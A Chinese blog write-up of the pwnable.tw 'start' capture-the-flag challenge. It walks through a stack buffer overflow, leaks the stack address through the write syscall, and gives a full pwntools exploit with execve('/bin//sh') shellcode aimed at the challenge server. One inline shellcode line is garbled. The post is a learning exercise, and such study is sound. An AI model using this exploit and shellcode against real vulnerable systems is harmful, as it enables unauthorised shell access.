pwnable.tw--start做题笔记

最新推荐文章于 2024-08-30 19:44:05 发布
最新推荐文章于 2024-08-30 19:44:05 发布
阅读量77 收藏
点赞数
文章标签: 笔记 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73179684/article/details/131515664
版权

题目

.text:08048060                 public _start
.text:08048060 _start          proc near
.text:08048060                 push    esp
.text:08048061                 push    offset _exit
.text:08048066                 xor     eax, eax
.text:08048068                 xor     ebx, ebx
.text:0804806A                 xor     ecx, ecx
.text:0804806C                 xor     edx, edx
.text:0804806E                 push    3A465443h
.text:08048073                 push    20656874h
.text:08048078                 push    20747261h
.text:0804807D                 push    74732073h
.text:08048082                 push    2774654Ch
.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write
.text:08048091                 xor     ebx, ebx
.text:08048093                 mov     dl, 3Ch
.text:08048095                 mov     al, 3
.text:08048097                 int     80h             ; LINUX -
.text:08048099                 add     esp, 14h
.text:0804809C                 retn
.text:0804809C _start          endp ; sp-analysis failed

该题由汇编写成,比较简短,且checksec出无其他保护措施

 

分析

1.可以看到两个int 80h指令(linux系统中的系统调用是通过该指令执行的)参考文章

其中第一个int 80h的调用号是4(al存放调用号),对应的调用write函数

其中第二个int 80h的调用号是3,对应的调用read函数

(他们对应的参数分别存放在各个寄存器上)

2.read函数存在溢出 

溢出偏移为0x14

由于该程序无栈保护,我们直接将shellcode填写到栈上

但由于地址空间随机化(ASLR),我们每次打开程序其都会将栈的地址随机化,我们将eip控制返回到我们栈时,我们是不知道此时的栈地址的,故我们需要利用rop先将栈的地址泄露 

 3. 利用前面的write函数打印栈地址

  将返回地址更改为0x8048087

.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write

   所以我们的第一个payload为

writeaddr=0x8048087

payload1=b'a'*(0x14)+p32(writeaddr)

得到的栈地址还需要加上0x14,因为到后面read函数时栈回回收(add esp,0x14)

leakaddr=u32(p.recv(4))

retaddr=(leakaddr+0x14)

 此时第二个payload为

shellcode=b''/x31/xc0/x31/xd2/x52/x68/x2f/x2f/x73/x68/x68/x2f/x62/x69/6e"

payload2=b'a'*(0x14)+p32(retaddr+0x14)+shellcode

 完整poc

from pwn import*

#p=process("/home/zzr/桌面/start")
p=remote("chall.pwnable.tw",10000)
context(log_level='debug',arch='i386',os='linux')

#gdb.debug(p,'break start')
#gdb.attach(p)
#pause()
p.recv()

#payload=p32(0x8048060)
#p.sendline(payload)

#shellcode=asm(shellcraft.sh())

shellcode=b"\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"
payload1=b'a'*(0x14)+p32(0x8048087)

#gdb.attach(p)
#pause()
p.send(payload1)
#p.recv(4)
leakaddr=u32(p.recv(4))
#leakaddr=u32(p.recv(4))
print(hex(leakaddr))
#print(addr)

retaddr=leakaddr
print(hex(retaddr))


#gdb.attach(p)
#pause()
payload2=b'a'*(0x14)+p32(retaddr+0x14)+shellcode
#pause()
p.sendline(payload2)


p.interactive()

总结 

还是得多调试

zzr_maker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
TW6.1.5.8-Enterprise-Linux
08-31
TW6.1.5.8_Enterprise_Linux TongHttpServer(THS)是一款功能强大、稳定高效、高性价比、易于使用、便于维护的负载均衡软件产品。THS 不仅可以满足用户对负载均衡服务的需求,提升系统可靠性、高效性、可扩展性及...
hackathon.tw-website
06-03
鲍尔 $ npm install -g bower$ bower i吞咽 $ npm install -g gulp$ npm install -g less$ npm i用法 $ gulp less
I-120E 公版软件-TW.TW-ONU_V1.0_R1B01D30127-4339.w.zip
11-06
"I-120E 公版软件-TW.TW-ONU_V1.0_R1B01D30127-4339.w.zip" 这个标题揭示了几个关键信息。首先,“I-120E”是设备型号,这通常指的是一个特定的光网络单元(Optical Network Unit, ONU),在家庭或小型企业网络中...
PyPI 官网下载 | tw2.core-2.2.1.1-py2.7.egg
02-07
标题中的“PyPI 官网下载 | tw2.core-2.2.1.1-py2.7.egg”指的是Python的包管理器PyPI(Python Package Index)上发布的名为`tw2.core`的库的一个特定版本,即2.2.1.1,且这个版本是针对Python 2.7编译的。...
ModernWeb.tw-2015:ModernWeb.tw 2015 演讲
06-06
在2015年,"ModernWeb.tw"这个会议探讨了Web技术的最新进展和未来趋势,尤其是聚焦于HTML的发展。HTML,全称为超文本标记语言(HyperText Markup Language),是构建网页内容的基础语言,自其诞生以来,一直在不断...
12306项目学习笔记(框架篇Base)
qq_74851649的博客
08-30 478
首先学习的是基础框架提供了一种静态方式来访问Spring容器中的Bean,适用于某些特定场景,如工具类和框架集成。在12306项目中由于我们引入了RocketMQ消息队列,这些库的对象通常不是Spring管理的,无法直接使用@Autowired注入,所以需要类提供一种静态方式来访问Spring容器中的Bean。比如在我们的TicketServiceImpl中的bean对象就是用以下方法获取的。
软件测试学习笔记丨Pytest配置文件
ceshiren_com的博客
08-27 3032
pytest.ini是pytest的配置文件;可以修改pytest的默认行为;不能使用任何中文符号,包括汉字、空格、引号、冒号等。
给自己复盘的随想录笔记-链表
weixin_46321761的博客
08-26 1000
1.核心是addAtIndex(int index, int val);需要判断index,如果大于size,返回;如果
Java基础(6)- Java代码笔记3
weixin_47062560的博客
08-30 580
数据类型[][] 数组名 = new 数据类型[m][n]数据类型 数组名[][] = new 数据类型[m][n]数据类型[] 数组名[] = new 数据类型[m][n]m:代表二维数组长度n:代表二维数组中每个一维数组的长度。
【项目】云备份系统笔记
m0_73713491的博客
08-27 974
就包含一个类,config,是读取配置文件的类,因为配置文件只有一份,所以可以采用单例模式,把config类的构造函数私有化,只能通过一个公共成员函数getinstance()来创建对象(new config()),在类的内部可以调用私有化构造函数,构造函数里面再调用读取配置文件的函数,用自己实现的工具类读取配置文件,将读到的内容放到一个字符串中,然后再将字符串用Json进行序列化,然后给类中的成员变量进行赋值,类中的成员变量就包含了cloud.conf里面包含的信息,一一对应。
谷粒商城实战笔记-282~283-商城业务-订单服务-提交订单的问题
epitomizelu的专栏
08-29 977
Services Panel 是 IntelliJ IDEA 提供的一个功能模块,旨在帮助开发者更好地管理和监控应用程序中的服务组件。它位于 IDE 的右侧面板中,可以方便地访问一系列与项目相关的服务和工具。
数据结构(邓俊辉)学习笔记】串 06——KMP算法:构造next[]表
weixin_44399845的博客
08-27 735
KMP算法:构造next[]表
MATLAB学习笔记5
probably121的博客
08-30 483
计算点(1,2)到点(4,6)的距离1.2 函数的输入输出。函数通常保存在一个`.m`文件中,文件名需要和函数名相同。使用`varargin`和`varargout`可以创建接受可变数量输入或输出参数的函数。
GB28181 SDP协议学习笔记
yjkhtddx的专栏
08-27 983
其中第一位为历史或者实时媒体流的标识位,0为实时,1为历史;第2位到第6位取20位SIP监控域ID之中的4-8位作为域标识;第7-10位作为域内媒体流标识,是一个与当前域内产生的媒体流SSRC值后4位不重复的四位十进制整数。"v="字段表示会话描述协议的版本。本文定义的版本为0,没有次版本号。当回放或者下载时,t行值为开始时间,结束时间,采样" "分隔。"Playback"代表历史回放。"Download"代表文件下载。"Talk"代表语音对讲。"Play"代表实时点播。
深度学习入门笔记
本人hexo博客:www.boluoboluobo.top
08-29 735
个人感觉其实神经网络其实就是一个万能的拟合器,训练神经网络的过程,就是让计算机自己从大量的数据中寻找一条公式。这些数据有输入,输出结果,就是中间的函数映射是未知的,寻找的就是这些未知的映射。我们创建的神经网络,就是假定了函数的很多参数,通过损失函数,丈量与实际真实结果之间的距离。目标就是缩小之间的距离,而这个过程就相当于寻求一个函数的最低点,最低点的特征是导数为0,因此反向传播求导是获取了探寻最低点的方向,学习率就是前进的步长。
Shader笔记:光照与阴影1
qq_39377889的博客
08-27 863
浅入深出,由ShadowCaster引入URP阴影的渲染机制,并以此为拓展,阐述了一些阴影渲染的画面问题,并对实际运用技术点的含义与原理进行了解析。
C++学习笔记----5、重用之设计(三)---- 设计可用的接口(3)
weixin_71738303的博客
08-30 693
通用接口可以应用于多种任务。如果你将应该通用的接口做成了只能为一个应用所用,那么对于其他目的则不可用。以下是几个要记住的指导思想。
嵌入式Linux学习笔记-Linux基础操作
汘荨的博客
08-30 654
vi 编辑器是一个运行在终端的文本编辑器,类似于 windows 下的记事本。它的升级版 vim 编辑器功能更丰富。vi 的基本操作是:从终端输入 vi 1.txt 后可进入一般模式;按 i 可进入编辑模式,按ESC退出编辑模式;输入“:”进入命令行模式执行各种命令,按ESC退出命令行模式;按“ :wq ” 保存修改并退出 vi。
JavaScript中DOW和BOW;笔记分享;知识回顾
最新发布
weixin_72637723的博客
08-30 764
JavaScript中DOW和BOW;window对象及常用方法;DOM操作的内容;DOM节点分类node;document对象及使用
字符间隔.----Tw: 设置单词间隔.----Tz: 设置水平缩放.----TL: 设置Leading.----Tf: 设置文本字体.----Tr: 设置Render(渲
07-01
2. 单词间隔(Word Spacing, Tw): 指的是单词之间的间距,即单词末尾和下一个单词开头之间的空白。在InDesign中,这个设置通常在“Type” > “Tracking” 或者使用快捷键Ctrl+T(Windows/Linux)或Command+T(Mac)...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值